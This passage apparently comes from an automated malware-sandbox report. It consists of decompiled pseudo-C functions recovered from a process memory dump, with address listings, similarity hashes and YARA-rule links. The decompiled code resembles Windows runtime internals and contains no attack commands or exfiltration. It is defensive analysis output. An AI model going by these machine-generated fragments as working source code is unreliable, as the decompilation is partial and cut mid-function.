																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04A895D0();
																			L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04A8B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04A83D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04A8B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x04a64128
0x04a64135
0x04a6413c
0x04a64141
0x04a64145
0x04a64147
0x04a6414e
0x04a64151
0x04a64159
0x04a6415c
0x04a64160
0x04a64164
0x04a64168
0x04a6416c
0x04a6417f
0x04a64181
0x04a6446a
0x04a6446a
0x04a6418c
0x04a64195
0x04a64199
0x04a64432
0x04a64439
0x04a6443d
0x04a64442
0x04a64447
0x00000000
0x04a6419f
0x04a641a3
0x04a641b1
0x04a641b9
0x04a641bd
0x04a645db
0x04a645db
0x00000000
0x04a641c3
0x04a641c3
0x04a641ce
0x04a641d4
0x04aae138
0x04aae13e
0x04aae169
0x04aae16d
0x04aae19e
0x04aae16f
0x04aae16f
0x04aae175
0x04aae179
0x04aae18f
0x04aae193
0x00000000
0x04aae199
0x00000000
0x04aae199
0x04aae193
0x00000000
0x00000000
0x00000000
0x04a641da
0x04a641da
0x04a641df
0x04a641e4
0x04a641ec
0x04a64203
0x04a64207
0x04aae1fd
0x04a64222
0x04a64226
0x04aae1f3
0x04aae1f3
0x04a6422c
0x04a6422c
0x04a64233
0x04aae1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04a64239
0x04a64239
0x04a64239
0x04a64239
0x04a64233
0x04a64226
0x04a641ee
0x04a641ee
0x04a641f4
0x04a64575
0x04aae1b1
0x04aae1b1
0x00000000
0x04a6457b
0x04a6457b
0x04a64582
0x04aae1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x04a64588
0x04a64588
0x04a6458c
0x04aae1c4
0x04aae1c4
0x00000000
0x04a64592
0x04a64592
0x04a64599
0x04aae1be
0x00000000
0x00000000
0x00000000
0x00000000
0x04a6459f
0x04a6459f
0x04a645a3
0x04aae1d7
0x04aae1e4
0x00000000
0x04a645a9
0x04a645a9
0x04a645b0
0x04aae1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x04a645b6
0x04a645b6
0x04a645b6
0x00000000
0x04a645b6
0x04a645b0
0x04a645a3
0x04a64599
0x04a6458c
0x04a64582
0x00000000
0x00000000
0x00000000
0x00000000
0x04a641f4
0x04a6423e
0x04a64241
0x04a645c0
0x04a645c4
0x00000000
0x04a645ca
0x04a645ca
0x00000000
0x04aae207
0x04aae20f
0x00000000
0x00000000
0x00000000
0x00000000
0x04a645d1
0x00000000
0x00000000
0x04a645ca
0x00000000
0x04a64247
0x04a64247
0x04a64247
0x04a64249
0x04a64249
0x04a64249
0x04a64251
0x04a64251
0x04a64257
0x04a6425f
0x04a6426e
0x04a64270
0x04a6427a
0x04aae219
0x04aae219
0x04a64280
0x04a64282
0x04a64456
0x04a645ea
0x00000000
0x04a645f0
0x04aae223
0x00000000
0x04aae223
0x04a6445c
0x04a6445c
0x00000000
0x04a6445c
0x00000000
0x04a64288
0x04a6428c
0x04aae298
0x04a64292
0x04a64292
0x04a6429e
0x04a642a3
0x04a642a7
0x04a642ac
0x04aae22d
0x04a642b2
0x04a642b2
0x04a642b9
0x04a642bc
0x04a642c2
0x04a642ca
0x04a642cd
0x04a642cd
0x04a642d4
0x04a6433f
0x04a6433f
0x04a642d6
0x04a642d6
0x04a642d9
0x04a642dd
0x04a642eb
0x04aae23a
0x04a642f1
0x04a64305
0x04a6430d
0x04a64315
0x04a64318
0x04a6431f
0x04a64322
0x04a6432e
0x04a6433b
0x04a6433b
0x00000000
0x04a6432e
0x04a642eb
0x04a6434c
0x04a6434e
0x04a64352
0x04a64359
0x04a6435e
0x04a64361
0x04a6436e
0x04a6438a
0x04a6438e
0x04a64396
0x04a6439e
0x04a643a1
0x04a643ad
0x04a643bb
0x04a643bb
0x04a643ad
0x04a6436e
0x04a643bf
0x04a643c5
0x04a64463
0x04a64463
0x04a643ce
0x04a643d5
0x04a643d9
0x04a643df
0x04a64475
0x04a64479
0x04a64491
0x04a64491
0x04a64479
0x04a643e5
0x04a643eb
0x04a643f4
0x04a643f6
0x04a643f9
0x04a643fc
0x04a643ff
0x04a644e8
0x04a644ed
0x04a644f3
0x04aae247
0x00000000
0x04a644f9
0x04a64504
0x04a64508
0x04a6450f
0x04aae269
0x00000000
0x04a64515
0x04a64519
0x04a64531
0x04a64534
0x04a64537
0x04a6453e
0x04a64541
0x04a6454a
0x04aae255
0x04aae255
0x04aae25b
0x04aae25e
0x04aae261
0x04aae261
0x04a64555
0x04a64559
0x04a6455d
0x04aae26d
0x04aae270
0x04aae274
0x04aae27a
0x04aae27d
0x04aae28e
0x04aae28e
0x04a64563
0x04a64563
0x04a64569
0x04a64569
0x00000000
0x04a6455d
0x04a6450f
0x00000000
0x04a644f3
0x04a643ff
0x04a64405
0x04a64405
0x04a64405
0x04a642ac
0x04a6428c
0x04a64282
0x04a64407
0x04a6440d
0x04aae2af
0x04aae2af
0x04a64413
0x04a64413
0x00000000
0x04a641d4
0x00000000
0x04a641c3
0x04a641bd
0x04a64415
0x04a64415
0x04a64416
0x04a64417
0x04a64429
0x04a6416e
0x04a6416e
0x04a64175
0x04a64498
0x04a6449f
0x04aae12d
0x00000000
0x04aae133
0x00000000
0x04aae133
0x04a644a5
0x04a644a5
0x04a644aa
0x00000000
0x04a644bb
0x04a644ca
0x04a644d6
0x04a644d7
0x04a644d8
0x04a644e3
0x04a644e3
0x04a644aa
0x04a6417b
0x04a6417b
0x04a6417b
0x00000000
0x04a6417b
0x04a64175
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e0fb59ce3e022b6832f621b15e7740df21435c2ca9b268a68a769146f4bbd08
Instruction ID: b1808b40ab2ab67c88a338cf81a941696ac5ce4e51fed2555b5ef0b6c86a1240
Opcode Fuzzy Hash: 3e0fb59ce3e022b6832f621b15e7740df21435c2ca9b268a68a769146f4bbd08
Instruction Fuzzy Hash: DBF17B706082118BD724DF29C484A7BB7F2FF98708F14492EF896CB290E734E895DB56

Uniqueness

Uniqueness Score: -1.00%

Function 04A720A0, Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04A720A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4b38714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04A72EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04A72EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E04A458EC(_t240);
									_t221 =  *0x4b35cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4b35cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04A84A2C(0x4b36e40, 0x4a84b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04A67D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4a25c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E04A7F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E04A7F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04AC7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04A62400(_t267 + 0x20);
															}
															L04A62400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04A72397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04A62280(_t134, 0x4b38608);
									__eflags =  *0x4b36e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E04A5FFB0(_t198, _t241, 0x4b38608);
										__eflags = _t253;
										if(_t253 != 0) {
											L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4b36e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4b38608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04A76B90(_t210,  &_v64);
										_t262 =  *0x4b38608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E04A7E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E04A897C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E04A8006A(0x4b38608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4b38608);
												E04A8B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4b36904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4b36e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E04A5FFB0(_t198, _t240, 0x4b38608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E04A800C2(0x4b38608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x04a720a0
0x04a720a8
0x04a720ad
0x04a720b3
0x04a720b8
0x04a720c2
0x04a720c7
0x04a720cb
0x04a720d2
0x04a72263
0x04a72266
0x04ab5836
0x04ab5836
0x00000000
0x04a7226c
0x04a7226c
0x04a72270
0x04a72274
0x04a720e2
0x04a720e2
0x04a720e6
0x04a720ee
0x04ab57dc
0x04ab57de
0x04ab57ec
0x04ab57ec
0x04ab57f1
0x04ab57f3
0x04ab57f8
0x00000000
0x04ab57f8
0x04ab57e0
0x04ab57e4
0x04ab57ea
0x00000000
0x00000000
0x00000000
0x04ab57ea
0x04a720f4
0x04a720f4
0x04a720f8
0x04a720f8
0x04a720fc
0x04a72100
0x04a72106
0x04a72201
0x04a72206
0x04a7220b
0x04a7220e
0x04a722a9
0x04a722ac
0x00000000
0x00000000
0x04a722b2
0x04a722b5
0x04ab5801
0x04ab5806
0x00000000
0x00000000
0x04ab5810
0x04ab5815
0x04ab5818
0x00000000
0x00000000
0x04ab581e
0x04a722bb
0x04a722bb
0x04a72218
0x04a72218
0x04a7221c
0x04a72220
0x04a72222
0x04a722c2
0x04a722c4
0x04a722dc
0x04a722dc
0x04a722e1
0x00000000
0x00000000
0x00000000
0x04a722e7
0x04a722c8
0x04a722cd
0x04a722d3
0x04a722d6
0x04ab5823
0x04ab5825
0x04ab5827
0x00000000
0x00000000
0x04ab582d
0x00000000
0x04ab582d
0x00000000
0x04a72228
0x04a72228
0x00000000
0x04a72228
0x04a72222
0x04a72214
0x04a72214
0x00000000
0x04a72114
0x04a72114
0x04a72114
0x04a7211a
0x04a7211c
0x04a72348
0x04a7234d
0x04ab5840
0x04ab5845
0x04ab5848
0x04ab584e
0x04ab584e
0x04ab5848
0x04a72353
0x04a72355
0x04a72388
0x04a72388
0x04a72368
0x04a7236a
0x04a7236c
0x04a7238f
0x00000000
0x04a7236e
0x04a7236e
0x04a7218e
0x04a7218e
0x04a72191
0x04a72195
0x04ab5a03
0x04ab5a06
0x04ab5a0c
0x04ab5a0f
0x04ab5a11
0x04ab5a13
0x04ab5a13
0x04ab5a19
0x04ab5a1f
0x00000000
0x04a7219b
0x04a7219b
0x04a721a0
0x04a72282
0x04a72284
0x04a72284
0x04a72284
0x04a72284
0x04a721a6
0x04a721a9
0x04a721ac
0x04a721ae
0x04a721b3
0x04a7228b
0x04a72290
0x04a72379
0x04a72296
0x04a72298
0x04a72298
0x04a72290
0x04a721b9
0x04a721be
0x04a722a2
0x04a722a2
0x04a721c4
0x04a721c8
0x04a721cc
0x04a721d0
0x04a721d4
0x04a721de
0x04a721e3
0x04ab5a29
0x04ab5a2c
0x00000000
0x00000000
0x04ab5a3b
0x00000000
0x04a721e9
0x04a721e9
0x04a721e9
0x04a721ee
0x04a721f1
0x04ab5a45
0x04ab5a4b
0x04ab5a52
0x04ab5a58
0x04ab5a5d
0x04ab5a5f
0x04ab5a71
0x04ab5a61
0x04ab5a6a
0x04ab5a6a
0x04ab5a76
0x04ab5a79
0x04ab5a7f
0x04ab5a83
0x04ab5a85
0x04ab5a87
0x04ab5a87
0x04ab5a8c
0x04ab5a91
0x04ab5a97
0x04ab5a9f
0x04ab5aa0
0x04ab5aa1
0x04ab5aa6
0x04ab5aab
0x04ab5ab1
0x04ab5ab3
0x04ab5ab9
0x04ab5aca
0x04ab5ad4
0x04ab5ad4
0x04ab5ade
0x04ab5ade
0x04ab5aab
0x04ab5a79
0x04ab5a52
0x04a721f7
0x04a721f9
0x04a721fe
0x04a721fe
0x04a721e3
0x04a72195
0x04a7236c
0x04a72122
0x04a72122
0x04a72124
0x04a72231
0x04a72236
0x04a72236
0x04a72238
0x04a72238
0x04a72240
0x04a72242
0x04a72244
0x04ab59fc
0x04a7218c
0x04a7218c
0x00000000
0x04a7218c
0x04a7224a
0x04a7224f
0x04a72256
0x04a72304
0x04a72309
0x04a7230f
0x04a7231e
0x04a7231e
0x04a7231e
0x04a72320
0x04a72325
0x04a7232a
0x04a7232c
0x04a7233e
0x04a7233e
0x00000000
0x04a7232c
0x04a72311
0x04a72317
0x04a7231a
0x04a7231c
0x04a72380
0x04a72380
0x04a72380
0x04a72384
0x00000000
0x00000000
0x04a72386
0x00000000
0x04a7231c
0x04a7225c
0x04a7225c
0x00000000
0x04a7225c
0x04a7212a
0x04a72134
0x04a72138
0x04a7213d
0x04ab5858
0x04ab5863
0x04ab5863
0x04ab5867
0x04ab586a
0x00000000
0x00000000
0x04ab586c
0x04ab586c
0x04ab5871
0x04ab5875
0x04ab5877
0x04ab5997
0x04ab599c
0x04ab59a1
0x04ab59a7
0x04ab59a7
0x00000000
0x04ab59a7
0x04ab587d
0x00000000
0x04ab588b
0x04ab588b
0x04ab5890
0x04ab5892
0x04ab5894
0x04ab5899
0x04ab589b
0x04ab58a0
0x04ab58a0
0x04ab58aa
0x04ab58b2
0x04ab58b6
0x04ab58be
0x04ab58c6
0x04ab58c9
0x04ab590d
0x04ab5917
0x04ab591a
0x04ab591c
0x04ab5920
0x04ab5928
0x04ab592a
0x04ab592c
0x04ab592e
0x04ab592e
0x04ab58cb
0x04ab58cd
0x04ab58d8
0x04ab58e0
0x04ab58f4
0x04ab58fe
0x04ab58fe
0x04ab593a
0x04ab593e
0x04ab5940
0x04ab5942
0x00000000
0x04ab5944
0x04ab5944
0x04ab5949
0x04ab594e
0x04ab594e
0x04ab5953
0x04ab595b
0x04ab5976
0x04ab5976
0x04ab597a
0x04ab597f
0x00000000
0x00000000
0x00000000
0x00000000
0x04ab5981
0x04ab5981
0x04ab5981
0x04ab5983
0x04ab5988
0x04ab598d
0x04ab5991
0x04ab5991
0x00000000
0x04ab595d
0x04ab595d
0x04ab5963
0x04ab5965
0x00000000
0x00000000
0x00000000
0x00000000
0x04ab5967
0x04ab5967
0x04ab596b
0x04ab596d
0x00000000
0x00000000
0x04ab596f
0x04ab5971
0x04ab5971
0x04ab5974
0x00000000
0x00000000
0x00000000
0x04ab5974
0x00000000
0x04ab5967
0x04ab595b
0x04ab5942
0x04ab5863
0x04a72143
0x04a72143
0x04a72149
0x04a7214f
0x04a722f1
0x04a722f6
0x00000000
0x04a72173
0x04a72173
0x04a7217d
0x04a72181
0x04a72186
0x04ab59ae
0x04ab59b2
0x04ab59b5
0x04ab59b7
0x04ab59ba
0x04ab59cd
0x04ab59d1
0x04ab59d5
0x04ab59d9
0x04ab59db
0x00000000
0x00000000
0x04ab59dd
0x04ab59dd
0x04ab59e1
0x04ab59e4
0x04ab59e7
0x04ab59ee
0x04ab59ee
0x04ab59f3
0x04ab59f3
0x00000000
0x04a72186
0x04a7214f
0x04a72106
0x04a72266
0x04a720d8
0x04a720da
0x04a720e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca6136490a52e3f62064c124e07eaae55b3ed38debec9eea9d15383c59be847b
Instruction ID: a8e15c0a5dc6d493e9e7527d65974788442bd5b3759553a3667eb678b614af85
Opcode Fuzzy Hash: ca6136490a52e3f62064c124e07eaae55b3ed38debec9eea9d15383c59be847b
Instruction Fuzzy Hash: 26F11672B09341AFE735CF28C8407AA77E5BF85368F04899DE9959B241E734F841CB92

Uniqueness

Uniqueness Score: -1.00%

Function 04A5D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E04A5D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
